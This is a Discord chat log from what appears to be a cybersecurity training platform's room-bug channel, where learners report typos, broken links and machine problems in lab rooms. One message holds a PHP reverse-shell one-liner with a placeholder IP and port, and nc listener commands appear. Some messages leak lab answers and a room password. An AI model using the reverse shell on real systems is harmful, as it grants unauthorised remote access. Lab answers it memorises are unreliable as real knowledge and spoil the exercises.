#room-bugs

1 messages · Page 16 of 1

obsidian kiln
#

Fixed 👍

honest crescent
#

But room juiceshop is still full of hints etc.

twin tapir
#

I believe that’s because cake originally made the room without a large walkthrough aspect then had to add in some hints and walkthroughs for answers as users were getting hung up on questions

honest crescent
#

Ah

#

Okay

#

Makes sense, but it's easier than all other boxes if you followed the others

twin tapir
#

It’s not meant to be hard

honest crescent
#

Fair

languid hearth
eternal summit
#

I think it just takes a long while to boot?

languid hearth
#

not really

#

I waited 10 mins as it said on the taks

#

task*

#
PORT     STATE SERVICE  REASON  VERSION
8000/tcp open  http-alt syn-ack
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, Kerberos, RPCCheck, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 
|     Date: Wed, 09 Dec 2020 21:34:11 GMT
|     Connection: close
|   FourOhFourRequest, GetRequest, HTTPOptions: 
|     HTTP/1.1 404 
|     Content-Length: 0
|     Date: Wed, 09 Dec 2020 21:34:10 GMT
|     Connection: close
|   RTSPRequest, Socks4, Socks5, X11Probe: 
|     HTTP/1.1 400 
|     Date: Wed, 09 Dec 2020 21:34:10 GMT
|_    Connection: close
|_http-title: Site doesn't have a title.
timber bone
#

The hint for the first question of day 9 of AOC says this Recall how Linux indicates permissions to files and folders from Day 8! and i don't know if i'm blind but i didn't see nothing about file permissions in day 8

glad badger
#

That hint can probably be removed for Day 9 Q1. I don't have it in my test notes as being there, so it is new. Thanks @timber bone

cold swallow
#

is it bug ?

eternal summit
#

No

#

That's where the ARP comes from, not what it resolves to?

#

Maybe there are multiple IPs?

cold swallow
#

ok will check

#

How would you describe that it is possible to use multiple IPs with the same mac address?

#

-Modem mac address?

eternal summit
#

This is no longer relevant to room bugs

cold swallow
#

Thx btw

naive eagle
#

Yeah i get that part now, but the rest of the hydra section reads like a walkthrough with example commands, in which the json looks to be passed as form encoded, and I think it could be worth making a more prominent note about the fact that you might want to try specifying a content type header if your hydra run doesn't seem to be working, or something to that effect

frank light
#

In the regex room
To match the IPv4 addresses
"(\d{1,3}.){3}\d{1,3}" got accepted as the correct answer
But it also accepts
01.01.01.01
999.999.999.999

#

Was the motive only to match IPs, not caring about the wrong ips?

#

I understand that creating the regex room is hard since you can accept only a single answer
Just wanted to clarify

eternal summit
#

What task is that?

#

Match every possible IPv4 IP address

#

You do that

#

You match other things, but you match all of those

frank light
#

It's in Task5

signal sleet
#

Advent of Cyber 2
Day 7 Question 2
Answer will be : http.request.method == GET
Double equal is right but it taking correct answer on single equal

I'm not a pro on this things so if I'm wrong please pardon my mistakes.

fervent hearth
#

In adventofcyber2 there is a spelling mistake in the question 4 of day 9 (task 14) the last word should say from but it says frm

wheat fractal
#

Hey all, Fairly new to TryHackMe and trying the Kenobi room.
When I try to mount the NFS i'm getting: access denied by server while mounting 10.10.85.205:/var
Any ideas?

vocal zinc
#

Sudo

eternal summit
#

I don't think this is a bug

wheat fractal
#

I am running as root, before I tried with sudo and same results

#

Since the room gives the commands with screenshots, I'm pretty sure that's all supposed to work, but I can't connect to the NFS as it tells me to. Isn't that a bug?

eternal summit
#

Go to the room help chats first

#

The room has not changed

#

99.9% chance that it's user error, which is why I'm directing you there

wheat fractal
#

ok, i'll ask there

mellow grail
#

room : jvmreverseengineering > task 1 and task 5 image link doesn't work anymore

real barn
#

typo on /room/completebeginner "On the contrary, it's how actually learn to solve the problem."

safe plover
#

There is a bug in the Advent of Cyber 2 room that doesn't let me Terminate the machine instance I've deployed

eternal summit
#

????

safe plover
north gyro
#

refresh the page

safe plover
#

When I do that, the instance still being there

north gyro
#

do you want it deployed or terminated?

safe plover
#

Terminated

north gyro
#

after a refresh is the terminate button visible?

safe plover
#

Yes

north gyro
#

does clicking it terminate the instance?

safe plover
#

The website say it was terminated, but when refreshing it is there again

north gyro
#

does the instance have an expiry?

safe plover
#

Yes, I've been waiting at least 40 min. The timer is close to zero but I reported the issue btw

north gyro
#

try clearing your cookies, not sure if it will help, you will need to login again

safe plover
#

Done

#

But the issue still there

north gyro
#

must be in the backend

#

probably not much you can do

#

except wait

obsidian kiln
safe plover
#

Yeah, that's what I thought

obsidian kiln
#

Might be able to force a termination

north gyro
#

try terminate(this) in the console

obsidian kiln
#

Nah, bit more complex than that

#

But we had some problems a while back

#

Szy came up with a bunch of useful little snippets -- just shove 'em into the dev console and it might solve the problem

north gyro
#

nice

safe plover
#

I did both and didn't worked, but the room expire time is 4 min

north gyro
#

coffee time?

safe plover
#

Jajaj maybe tea, coffee ruin my sleep. It's 21:12 here

#

Thank you both btw

north gyro
#

np

safe plover
#

It's stuck

eternal summit
#

@lucid oasis super sorry if you're asleep, but any idea?

north gyro
#

oh no negative numbers

safe plover
#

Does the AoC 2 machine respond to ping? Because the initial purpose of terminating it was because trying to enumerate smb users and it didn't work

eternal summit
#

There's no single AoC2 machine

safe plover
#

Day 10 sorry

north gyro
#

might sound dumb but try adding an hour

safe plover
#

Actually, now the instance disappeared

north gyro
#

ninja probably did something

safe plover
#

In that case, thank you @eternal summit

eternal summit
#

Discord moderators are discord moderators

#

Not site staff

north gyro
#

well it either died by itself or someone killed it

#

dont know which

safe plover
#

Hahahah well, now I'm afraid of deploy it again. But thank you very much for the help

north gyro
#

sounds like its good to go again

#

lightning never strikes twice?

safe plover
#

Hahaha literally that happened to someone, I think I heard about that lightning stuff

north gyro
#

yeah, some people are lightning rods

#

i had lightning strike a tree like 100 meters away and i hit the deck like a bomb was going off

safe plover
#

Well, this is not the case. The deployed machine have been terminated successfully

#

Good night, and thank you everyone that helped me

primal shadow
#

In AoC2 Day 10: I think there's a typo:

why not give a few others a try and apply your knowledge in the "Kenobi" Capture the Flag (CTF) or the "Anonymous" (Walkthrough)
Isn't Anonymous the CTF and Kenobi the Walkthrough?

obsidian kiln
#

@dusky junco

dusky junco
#

Whoops!

#

😄

stable falcon
#

I'm not sure if this is a bug or if I'm just being dumb, but I've been having trouble using enum4linux in the Basic Pentesting room, using the same command John Hammond shows on his walk-through video.
I'm getting an error along the lines of 'Used uninitialized value $user' (I'll send through an image). It worked fine with today's Advent of Cyber task though, which is leading me to believe it's something that's changed in the Basic Pentesting box.

obsidian flame
#

hmm, try rebooting the box and see if the same happens @stable falcon

stable falcon
#

I've rebooted a couple of times, it still gives me the same error

obsidian flame
#

hmm, what do you get when you run enum4linux IP with no switches?

#

my sub expired today otherwise i would've checked for you 😦

ripe magnet
#

it's a free room iirc

obsidian flame
#

yeah, but i don't have a VM as i am on my work laptop

stable falcon
#

it seems to find the shares, but it's still got the same uninitialized value $user error, and gives 'unknown' for all the users in the RID cycling section

#

no worries!

obsidian flame
#

i can have a look at this in an hour or so for you. otherwise if anyone else is willing to have a look over it i don't mind

stable falcon
#

thank you!

obsidian flame
#

no worries, i do apologise for not being able to lend a hand as of now

ripe magnet
#

@stable falcon DM me

ripe magnet
#

Note: We uninstalled and reinstalled enum4linux, and tried the command without switch, still not working. It worked for him on the AoC2 challenge
I'm letting someone more competent than me help him

frail vigil
calm socket
#

Hi ! I have an issue with the flags validation for « All in One » room. I pwned the box and have the two flags but they seems to not working. Is anyone here who had the same problem ?

mellow grail
indigo orchid
#

Can any admins look into this one please?
In https://tryhackme.com/room/ccpentesting, task 21, smbclient, last question - In the interactive prompt, how would you upload your /etc/hosts file? when I type the answer put /etc/hosts and submit, BitDefender Total Security blocks the request or something and gives me a notification saying

Online Threat Prevention
An attempt to access your files from an external source was made by {IP address}. We blocked the connection to prevent remote code execution on your device.

and I get Uh-oh! undefined pop up on THM website.

eternal summit
#

Bitdefender gets false positives when you use /etc/hosts or /etc/passwd @indigo orchid

#

You're on windows

#

You don't have those files

#

Bit defender is lying to you.

indigo orchid
#

lol

#

i feel stupid now

#

thanks btw!

glacial tree
#

Not exactly a bug, but I don't know where to post this.
AoC Day 11's learning objectives are wrong, it is duplicated from Day 8.

hazy tiger
#

@dusky junco ?

dusky junco
#

Ah shoot — I’ll get to that when I get to my PC in an hour or so

wheat fractal
#

Man

#

This must be a pretty big typo 😆

fast bobcat
#

Hi there!

I've found some things in the current Advent of Cyber 2 room.
I'm not sure in the first two, but for me it seems logical this way.

In Day7 There is a text that says: "It's 6 AM and Elf McSkidy is clocking-in to..." I think it should be McEager, since the later part of the text suggests that way. "After logging in, Elf McEager proceeds..."

In Day10:
The first sentence in 10.3: "Whilst we learnt about one of the most commonplace protocols that are used for file-sharing on Day 10..." I thinks it refers to day 9.

In Day11: "Let's exploit a local copy of a DVWA (DamnVulernable Web App" It's just missing the closing bracket and the letter 'n' from vulnerable

wheat fractal
#

Oh thank god

#

Nothing related to me

#

You get to live @fast bobcat

fast bobcat
#

and in the 11.11 Covering our Tracks there is the"/var/log/<service/" <- missing a closing '>'

civic brook
#

Most of the task and room creators are not doing this full time and are volunteers, spelling and grammar mistakes are bound to occur

fast bobcat
fast bobcat
eternal summit
dusky junco
keen gate
#

Doing vulnversity and, um... ||Ubuntu|| is not an operating system 😂

green steppe
#

yes it is

eternal summit
#

xD

keen gate
#

I thought GNU was the OS, Linux was the kernel, and Ubuntu was the distro... but thinking about it, I guess you could call the distro an OS in the sense that the whole package does contain/is an OS.

eternal summit
#

Linux (/ˈlinʊks/ LEEN-uuks or /ˈlɪnʊks/ LIN-uuks[9]) is a family of open-source Unix-like operating systems based on the Linux kernel,[10] an operating system kernel first released on September 17, 1991, by Linus Torvalds.[11][12][13] Linux is typically packaged in a Linux distribution.

#

You can have non GNU linux

green steppe
#

Hold up do I have a copypasta for you

#

I'd just like to interject for a moment. What you're referring to as Linux, is in fact, GNU/Linux, or as I've recently taken to calling it, GNU plus Linux. Linux is not an operating system unto itself, but rather another free component of a fully functioning GNU system made useful by the GNU corelibs, shell utilities and vital system components comprising a full OS as defined by POSIX.

Many computer users run a modified version of the GNU system every day, without realizing it. Through a peculiar turn of events, the version of GNU which is widely used today is often called "Linux", and many of its users are not aware that it is basically the GNU system, developed by the GNU Project.

There really is a Linux, and these people are using it, but it is just a part of the system they use. Linux is the kernel: the program in the system that allocates the machine's resources to the other programs that you run. The kernel is an essential part of an operating system, but useless by itself; it can only function in the context of a complete operating system. Linux is normally used in combination with the GNU operating system: the whole system is basically GNU with Linux added, or GNU/Linux. All the so-called "Linux" distributions are really distributions of GNU/Linux.

keen gate
#

ohai RMS when did you get here

green steppe
#

Wait

#

Discord is not open source?

#

Deleting my account brb

frail vigil
#

Get the response copy pasta as well 😄

flat timber
eternal summit
#

@obsidian kiln rip your domain

obsidian kiln
#

Oh for the love of. Not again

#

Gimme a sec @flat timber

#

I think that was the only one I did pre-imgur days

#

I really should just set up an assets subdomain

#

Is that fixed now @flat timber?

flat timber
solemn topaz
lofty pilot
dusky junco
#

Hey thanks! Yes this is the right place

#

That's a Deskel room who unfortunately is no longer on the platform

#

as it's only for two questions, I'll remove the questions that require the pastebin links so that the rest of the room can be kept public

#

thanks (:

lofty pilot
hazy tiger
dusky junco
#

Ah that's a wicked find @lofty pilot Thanks for managing to dig that out! That's even better

#

I'll replace the tasks with the text. Wicked stuff

lofty pilot
#

Thanks @hazy tiger , awesome content

#

Sure @dusky junco , I like rooms created by deskel
Hope someday ctf 100 comes live again

tiny ginkgo
flat timber
#

@green steppe I was going through one of your pages, and was trying to access this link https://tryhackme.com/room/zthlinux but it showed that room is private. Is it that the room is no longer present or something ?

lunar vortex
#

@eternal summit The port generated for Looking Glass is nonexistent, it's apparently between two ports that respond "higher" and "lower" respectively, so I'm stuck

#

just gonna restart it, but that should be fixed

eternal summit
#

It's not gonna be touched

#

Seeing as it's impossible

#

Autogen boxes are a pain to work with

#

Yeah it's not mathematically possible for it to fail that way

molten pagoda
#

Not sure if its just my setup but on internal the address internal.thm doesnt resolve makes doing the room interesting.

obsidian kiln
#

There's no name resolution on the THM network -- mainly because each box could be deployed several times on the same subnet by different people

#

With that in mind, how do you think you could get it to resolve?

honest crescent
#

Apparently some rooms have in /etc/ folders with the dot files for the users IIRC. This I noticed a bit ago when doing a Linux VIP room where you had to read a user's files and I wasn't sure where to look. But these files also contain the flags...

#

I'm not sure if it's configurable with a cron job to make them unable to be read and if the dot files are removed it reinstates them with original perms, but maybe it could be useful. Not sure if it's a bug or a feature though

molten pagoda
obsidian kiln
#

No. As I said, what can you do locally to resolve it

#

Because that's what you're meant to be doing

molten pagoda
#

oh

obsidian kiln
#

Does the "hosts" file mean anything?

molten pagoda
#

Ah I thought it was just a bad set up haha

#

Ok so dns records

#

all good haha

obsidian kiln
#

Nah, no DNS

molten pagoda
#

Ah yeah sorry just what I mean is hosts so it doesnt use dns

#

I think.

#

but If there is something to do there then all good I will figure it out

flat timber
viral cobalt
flat timber
viral cobalt
#

we'll have to assault Pars with questions why the room is private :P he probably got tired of all the shiba1 questions

dusky junco
#

It's been made private as it has been split into three separate rooms (:

latent terrace
#

Has anyone ever addressed/enquired about the fact that the OWASP Top 10 - XXE box(Task 12) is sorta not really XXE?

After reading the code behind the flask app, it sort of feels a bit off. It's great the text covers the concepts and so forth, but after going through the lab and so forth, I accessed the box and read the code XXE.py to see if I could understand the issue from that side, but it led me to the conclusion that the app just looks for specific elements and then throws the output (which after testing is validated)

twin bay
#

Adventofcyber2 - Day 12 - Hint on the final task - Minor typo

Metasploit has post exploit suggestion scripts that may show your the "PATH"

latent terrace
#

owasptop10 - [Severity 8] Insecure Deserialization - Cookies Practical
Not sure if this is actually considered a bug, but the /admin panel doesn't actually validate/check if the usertype cookie is set to admin.

signal shore
#

@tough linden ~~Possible issue with windows10privesc room, task 9. AutoAdminLogon is set to 0. According to Microsoft documentation, AutoAdminLogon sets itself to 0 if no DefaultPassword was provided. https://docs.microsoft.com/en-us/troubleshoot/windows-server/user-profiles-and-logon/turn-on-automatic-logon~~ I managed to get it to work by guessing the password. Based on my understanding of the task, the password should have been present in the registry, but I could not locate it.

wheat fractal
indigo orchid
#

In Nmap room, Task 9 -
https://tryhackme.com/room/furthernmap
How would you perform a ping sweep on the 172.16.x.x network (Netmask: 255.255.0.0) using Nmap? (CIDR notation)

  • It accepted 172.16.0.0/18 in the answer while it should have only accepted 172.16.0.0/16.
eternal summit
#

Answer tolerance

#

Not exactly a room bug. Just a site bug

indigo orchid
#

ohh okay, just thought I should put it here since I am going through that room

dusky junco
dawn rover
#

Section 3 - Metasploit Setting up

#

The correct answer is - set SMBUser password

north gyro
#

@tribal dirge there is a 1 character tolerance sometimes

vivid bane
dawn rover
#

Alright got it

#

thanks

dawn rover
north gyro
#

so if you enter the correct answer then quickly change it, it accepts the wrong answer?

dawn rover
#

Yes exactly

hazy tiger
#

No, it just displays the wrong answer, it doesn’t accept it

#

If you refresh, the answer will change to the correct one.

dawn rover
#

Oh right yea

kind knot
#

Hello, something weird keeps happening in the Advent of Cyber room I'm in. Every time I deploy a machine after some time, I get the message that the machine is about to expire yet the banner shows like 30 minutes left.

#

Then after a couple minutes, I get the message that the machine has expired.

#

yet when I refresh the page, the machine is still up

crude current
#

Hi. I got stuck on Room: networkservices2 Task 9 Question 4: When listing options I only see SQL, RPORT, RHOSTS as required. But the answer should be different. I have no idea what I am missing. Any help is highly appreciated.

civic brook
#

@obsidian kiln your OWL images links are all broke in the writeup

obsidian kiln
#

In the writeup on my own blog?

#

@civic brook?

#

Loading fine for me

civic brook
#

go to snmp

obsidian kiln
#

That's after a cache dump as well

#

What's it showing you?

civic brook
obsidian kiln
#

What's the link pointing at?

obsidian kiln
#

Could you do a hard refresh for me?

#

As in Ctrl + F5

civic brook
#

working now

obsidian kiln
#

Perfect 👍

#

I had some htaccess problems a week or so ago which caused a bunch of that, but they're all pointing to the right place here now, so it shouldn't be a problem

civic brook
#

I thought it was that same, I didn't think I had it up that long though

obsidian kiln
#

Could potentially have served you a cached version if you'd looked at it previously

#

I have no idea what the cache times are for that thing

merry merlin
#

Hi, in "What the Shell?" room, it seems even though you have 2h timer on windows machine, it expires after 1 hour. Or did i killed it twice in same time? 🙂

eternal summit
#

Probably the site bug with windows machines

latent vessel
#

There is a bug for the deployment of machine. Machine is deployed but after certain seconds it says ur machine is expiring soon but when I refresh the page it is not so. Please look into the issue

eternal summit
latent vessel
#

I think it is a issue

#

Not a bug

eternal summit
#

@latent vessel it's not a bug with a specific room

#

This channel is for bugs with specific rooms

#

Not site bugs

latent vessel
#

I think it shows me weird things that's why

eternal summit
#

This is the wrong channel. Do you understand? Please repost it in #site-bugs @latent vessel

latent vessel
#

Ok sorry

soft crane
#

wasptop10 - [Severity 8] Insecure Deserialization - Code Execution
nc -lvnp 4444

#

Listening on 0.0.0.0 4444

nova marsh
orchid cedar
#

are there like forums or something where you can see what people did in response to things that seem messed up ? like in the burp suite room, how it says "Let's first take a look at decoder by revisiting an old friend. Previously we discovered the scoreboard within the site JavaScript. Return to our target tab and find the API endpoint highlighted in the following request:" ---and the site JavaScript and "scoreboard" etc none of this has been mentioned in the room i have no idea wtf it's talking about

eternal summit
#

Yes there are forums, but this isn't a room bug.

orchid cedar
#

great thanks

plucky jay
hazy tiger
mossy zinc
#

hey guys, just found out that the link provided in the Day 15 about scripting redirect to a private video on youtube

#
topaz thorn
#

He was aware and the video is up

mossy zinc
merry merlin
#

Hi, AttackerKB room should have hostname in certificate, but it is nowhere to be found. Darkstar skipped this one in his video as well 🙂

mossy zinc
#

kk, alright

#

😄

north gyro
#

room Linux strength training,
suggest change
What are the proceeding characters after the searched word you found?
to
What are the characters immediately after the searched word you found?

thanks.

obsidian kiln
#

@north gyro which task

north gyro
#

@obsidian kiln task 2, second last question

obsidian kiln
#

That wording didn't make sense as it was, so I have updated it

north gyro
#

@obsidian kiln thanks! 👍

tall nexus
#

proceeding is correct. but if the update makes it easier for people thats fine 🙂

obsidian kiln
#

You wouldn't use it in that context @tall nexus. Subsequent is the word you'd use when describing something that comes after something else.

#

Proceed as a verb does indeed mean to go forward though

#

(and use, that is weird, given you'd use preceding for something that comes before -- just a weird nuance of English)

astral briar
#

Complete Beginner path

tiny ginkgo
eternal summit
#

No it should say Wide

#

It's a reference to @faint ridge who is both wide, wise, and door control staff

faint ridge
#

Yeeee

dusky junco
#

Emphasis on wide

eternal summit
#

He can be both

tiny ginkgo
#

Oh..got it. Thanks for the clarification

tiny ginkgo
vocal zinc
#

dis true^

hazy tiger
#

Smh Bee

eternal summit
#

@dusky junco can u fix plz?

dusky junco
#

Bare with, that should of been updated?

#

but it doesn't appear to have been

vocal zinc
#

bear

tiny ginkgo
#

Firstly the requests.get() methods returns a response object which is getting stored in the html variable

#

To convert that object into a string object we can use "html.text"

#

The BeautifulSoup() function accepts a string in the first parameter which will be parsed using the parser we are specifying in the second parameter. So for this example we have to pass html.text instead of html.

#

Secondly, find_all() method accepts a HTML tag as input. So instead of passing " a href" we should only pass "a" as "a" i.e. anchor is a valid tag in html or else it will just return an empty list

#

Finally, To get all the links from webpage we can use the get() method.

#

So..It should be like this :- links = soup.find_all('a')
for link in links:
    print(link.get('href')) #We can use this get function to print only the links.

surreal stirrup
#

Room Advent of Cyber, today. Have a problem.

#

I cannot speak here. It will disturb the fun.

#

There is a path with all the answers.

#

Everything available in 2 min. No work or scripting.

eternal summit
#

@surreal stirrup With the source? That's being fixed atm

surreal stirrup
#

Okay

split ibex
#

hey in advent of cyber day 16 the server answers with santa's location even if "SANTA PROTECTION MECHANISM ACTIVATED." if you leave the script going, the challenge page says it should block my ip

drowsy stump
#

In day 16 the hint for the second question is wrong. it says it's /*/ with 5 asterisks and it's actually 3

warm wadi
#

Burp Suite
Task 7 - Target Definition
Question: What is the term for browsing the application as a normal user prior to examining it further?
Hint: This will both referenced in the paragraph I've included at the start of this task as well as the documentation for OWASP Juice Shop in getting started. Think of it as walking along a certain path.

I believe this is an error spelling and should be worded
This WAS both referenced in the paragraph I've included at the start of this task as well as the documentation for OWASP Juice Shop in getting started. Think of it as walking along a certain path.

drifting hull
#

Advent of cyber | day 5 | sql | internal server error ???????

naive tapir
#

Hi all.. I'm doing the CC Pentesting, Task 14 John the Ripper.. for questions about format and rules, the answer accepted has "--" but the man page describes single "-"

hazy tiger
#

Refresh your page, might be regex

naive tapir
naive tapir
hazy tiger
#

Wrong screenshot

naive tapir
#

Ok.. well I would have assumed that the rooms are based on the man pages

hazy tiger
#

If I were at my VM, I’d show you that it also has two

naive tapir
hazy tiger
#

Your manual seems to be... different?

eternal summit
#

They're long form flags

naive tapir
#

let me check the attack box

eternal summit
#

All the flags are prefixed with -

hazy tiger
#

You can also type john -h might be better

eternal summit
#

Long form flags are usually --

naive tapir
#

well the room also takes single - here a larger screenshot with a previous answer

#

the first one has single - as in the man pages

hazy tiger
vocal zinc
#

Jabba with the OG phone helping technique

#

Welcome to the club

naive tapir
hazy tiger
#

No

#

I don’t have permissions to edit other people’s rooms

#

I’m just a discord moderator 🤷‍♂️

naive tapir
hazy tiger
#

Regex

#

Answer tolerance

#

Your answers don’t have to be perfect to be accepted

eternal summit
#

Refresh the page.

naive tapir
#

ok thanks for the help! was very confused.. maybe should add a note saying that if it does not work try with the info from --help

marsh crag
#

Hi! When I submit answers in advent of cyber it says that the question was already answered. Refreshing the page make the answer dissappear.

vocal zinc
#

@dusky junco

gleaming shadow
dusky junco
#

Correct updated @gleaming shadow ty

gleaming shadow
#

wondering if the suffix isn't d as well

#

ah seems to be fixed after the refresh

green ermine
vocal zinc
#

Replace machine ip with The machine ip

green ermine
#

will that work

vocal zinc
#

My 2 options here:
1- answer your question with a yes and repeat what I said before because you didn’t try what I said
2- say no and come off as a poop head because you didn't try what I said

#

I opt for #2

  • no it won’t work I lied to you
viscid dragon
#

Does room vulnversity have certificate?
I completed the room where can i fetch my certificate?

eternal summit
#

@viscid dragon No.

viscid dragon
#

oh ok thank you

merry merlin
#

Hi, im just on Linux: Local Enumeration room, first (seems like super easy) task, i put short script (php -r '$sock=fsockopen("{IP}",{PORT}});exec("/bin/sh -i <&3 >&3 2>&3");') into cmd.php field with my ip and port (with nc -lvnp <port> waiting on my machine) but no shell is spawned, actually via tcpdump nothing even arrives. I tried even simple "nc <my IP> <port>"....nothing, interesting is that routing seems ok, because room website is working fine, any suggestion?

#

mkfifo works, interesting

merry merlin
#

copy and think twice, double right curly bracket on port get me...

wheat fractal
#

Everytime I post something in this channel i'm just being super nit picky about grammar and typos haha i'm sorry cri I found a few (what I think?) are oopsies in the Linux Fundamentals Part 3 room!

#

"find what your're looking for" Instead of "find what your looking for"

#

This is under Task 6 -grep in the same room "when I said the syntax was" instead of "when I says the syntax is" Just staying consistent with past tense and the flow of the room! blobheart

#

This is the last one I swear lol ;;! "except they're called directories" instead of "except their called directories" because "called" is an adjective! :d

green ermine
#

please help me

slate parrot
#

Issue in the “OWASP Top 10” room, Task 25, Q2. Visiting IP/admin (without changing cookie values) immediately reveals the flag.

sonic willow
green ermine
#

OHH OK

#

so then i have to click the link

surreal stirrup
#

||
from typing import Optional

from fastapi import FastAPI

from starlette.applications import Starlette
from starlette.routing import Mount
from starlette.staticfiles import StaticFiles

routes = [
    Mount('/static', app=StaticFiles(directory='static'), name="static"),
]

app = Starlette(routes=routes)

app = FastAPI()

counter = 0

@app.get("/items/{item_id}")
def read_item(item_id: int, q: Optional[str] = None):
    global counter
    counter += 1
    if counter >= 50:
        return {"item_id": item_id, "q": "SANTA PROTECTION MECHANISM ACTIVATED."}
    elif counter == 57:
        return {"item_id": item_id, "q": "Winter Wonderland, Hyde Park, London."}
    else:
        return {"item_id": item_id, "q": "Error. Key not valid!"}
    return {"item_id": item_id, "q": counter}

||

#

This is still available

#

Task 21 [Day 16] Scripting Help! Where is Santa?

signal shore
#

https://tryhackme.com/room/introtox8664
On the if statements continued section, there is a line that reads "The cmpl instruction compares the value of eax with that of the var_8h argument"
It appears the cmpl instruction is comparing the value of eax with that of the var_4h argument.

#

Minor typo, but is still confusing to someone unfamiliar with the subject.

vivid bane
#

I found similar thing for other windows machine too

topaz thorn
glad badger
#

Message with image deleted, as it is showing answers. @vivid bane

slate parrot
#

I am in the OWASP Room, Task 29. I am running the python script (having commented out the CVE as detailed in the notes), however that is generating the following error on the AttackBox: TypeError: a bytes-like object is required, not 'str'. I have tried adding a .encode() on line 54, but that does not resolve the issue. Any ideas?

latent vessel
#

U have a string to be added somewhere it's a type error it means string should not be there at that line other types can be associated there

slate parrot
#

The input for the file expects a string …

warm cobalt
#

On THM room Break it, task 1 the Insane flag, the pastebin is dead

distant field
#

I was currently doing 'Network Services' by @PoloMints. Task 7 mentions a Reverse Shell. I am wondering, why is that mentioned? In my understanding the telnet is no Reverse Shell but a Bind Shell.

eternal summit
#

@distant field The telnet service there gives you blind RCE.

#

You're using a reverse shell to go from blind to regular RCE.

#

This isn't a bug.

distant field
#

@eternal summit ah! Got it! thank you.

#

Note to self. Finish a room before providing feedback =)

astral briar
#

https://tryhackme.com/room/rust
Task 7 (Functions) has an attachment of a .zip and it contains 2 folders (code and questions) but both are empty
Doesn't seem necessary for an external material in order to complete the task questions

sly mason
#

on advent of cyber day 12, for the privesc is it intended that ||you can privesc by just running getsystem then migrating to winlogon.exe (in meterpreter)||? (not sure where to post this, sorry if it's in the wrong channel)

sonic willow
#

@green steppe rust ^^

green steppe
#

uh oh

#

thanks jake <£

gleaming shadow
#

There's a rust room?

green steppe
#

yuppp

#

made by yours truly

astral briar
#

it was good thanks 😄

still quiver
#

When looking at the 1st hint from Day 16, the hint itself looks like this:

#

Not sure if it is a bug or it's intended

hazy tiger
#

It looks intended

#

Lemme check

still quiver
#

Okey, just wanted to ask in case the hint is supposed to be any other thing

hazy tiger
#

Okay I'm going to contact the creator bee; they don't usually come on for another couple of hours so I'll let you know when they report back, thanks!

still quiver
#

Sure 🙂

#

Thanks

tame aspen
#

I don't know if it is already discussed here but i remember there once a time when most of the subscribed rooms were able to open and joined by non-subscribed user. I tried wireshark 101 and few others, and also i was able to open the learning offensive paths and saw the room list there. Was that a bug? I think right now the bug has been resolved somehow

mint harbor
latent terrace
#

I see a few a people already asked about it but in the "attacking kerberos" room, the question "What two services make up the KDC?" is shown with a solution format looking like this **,*** It should be like this **, *** With a space after the comma.

opaque compass
#

when i register a new " darren" i dont get automatically logged in as stated
neither can i log in manually with the set password

eternal summit
#

Please don't just ping me when you want help.

#

Everyone here is a volunteer.

#

We help when we want, and on our terms.

opaque compass
#

understood

latent terrace
#

i don't know if this is considered a room bug, but apache guacamole in the "post-exploitation basics" room keeps trying to connect but never gets an actual connection. i've tried over 3 times but there seems to be something wrong, second time i waited for 40 minutes to get a connection but no dice.

slate parrot
steep pollen
#

The room "Year of the Dog" has a bug.

#

The password of the "dylan" user is not working.

#

I double check the write-up.

hazy tiger
#

Are you sure you're typing it in correctly

steep pollen
#

100%

eternal summit
#

Are you sure they're not dynamic passwords?

steep pollen
#

Checked ssh and su

#

Would you mind checking on it?

#

If you need anything, pm me!

steep pollen
#

Please let me know if you have any updates. thnx

obsidian kiln
#

The box has not been updated since release, and the password for that one is static. Nothing has changed, therefore it will still work

steep pollen
#

The writeups don't have passwords in them.

#

But, the password is not working.

obsidian kiln
#

The password will work fine

#

I suspect you're skipping the exclamation mark from the end of it

#

Hm, Might have removed that actually. Can't remember

steep pollen
#

let me pm u

obsidian kiln
#

From memory I changed the password because it wasn't showing up there

#

Also please watch rule one @steep pollen

steep pollen
#

deleted the message. sorry for the spoil

obsidian kiln
#

I've confirmed that the password is still correct

steep pollen
obsidian kiln
#

As in, I remember doing it

steep pollen
#

Isn't the password supposed to be in the FILE

#

grep it...

obsidian kiln
#

I just did

#

That's a literal copy and paste from the file

steep pollen
#

ok

#

let me check again

#

I'm sure i did the copy/paste correctly

#

still nothing

#

let me send you a screenshot in pm

#

@obsidian kiln Thanks for the clearup

lucid quiver
#

Was messing with the post-exploitation basics room and noticed guac was taking a while to connect to RDP - checked the configuration of the remote system in guac and the access credentials in the guac config are mismatched with the course content. (changed password/domain and it loaded)

twin tapir
#

that room has guac what?

#

huh

#

TIL my room has guac on it

#

cc: @lucid oasis I certainly didnt set guac up in that room did you guys or @dusky junco ?

obsidian kiln
#

Yes, it was set up Cry

lucid quiver
#

ye easy way to see if guac is running is the ol ctrl+alt+shift (pops out the clipboard)

obsidian kiln
#

Skidy did it a few months ago

lucid quiver
#

anyways ye it worked post credential change

#

i assume those changes dont stick tho lol

north gyro
#

ROOM: "ZTH: Obscure Web Vulns"
TASK: "14"
PROBLEM: "Challenge can be bypassed by sending the same JWT token that you are supposed to manipulate!"
PROOF: "copy the JWT provided, and paste into the box"

iron reef
#

In "MAL: Researching" the image for hash collisions is the same as the image above

#

@dusky junco

lucid oasis
#

Let me test if its working

#

I disabled it, the problem is the password its using.

obsidian kiln
#

@wheat fractal fix

wheat fractal
#

Times like this

#

I wish I could just make changes directly

blissful iron
#

Hey I'm currently doing the network service room

#

But sadly I get the error that tun0 doesn't exist, Someone who had the same bug ?

obsidian kiln
obsidian kiln
blissful iron
#

@obsidian kiln I'm using the built in vm

obsidian kiln
#

Ah, then you don't have a tun0

#

Swap it for eth0 in whatever command the room is telling you to use

#

What's the task/question number?

blissful iron
#

Task 7 of the Network services room

obsidian kiln
#

I'll add a note in there after a shower

dusky junco
#

Thanks @iron reef I have added that to my list 👍

obsidian hawk
obsidian kiln
#

@obsidian hawk Linux Fundaments 1

slate parrot
#

@dusky junco In your MAL Intro course, in Task 2, feel paragraph 2 (including targeted sectors) is actually more consistent with a targeted attack, rather than a mass attack. Mass campaigns are rarely classed as APT either.

slate parrot
#

Also, in Task 3, “Maintaining Persistence” and “Persistence” should be combined.

obsidian hawk
teal barn
#

https://tryhackme.com/room/adventofcyber2 - Day 20
I wasn't able to log in SSH with ssh -l mceager 10.10.222.113 or ssh mceager@10.10.222.113 + r0ckStar!
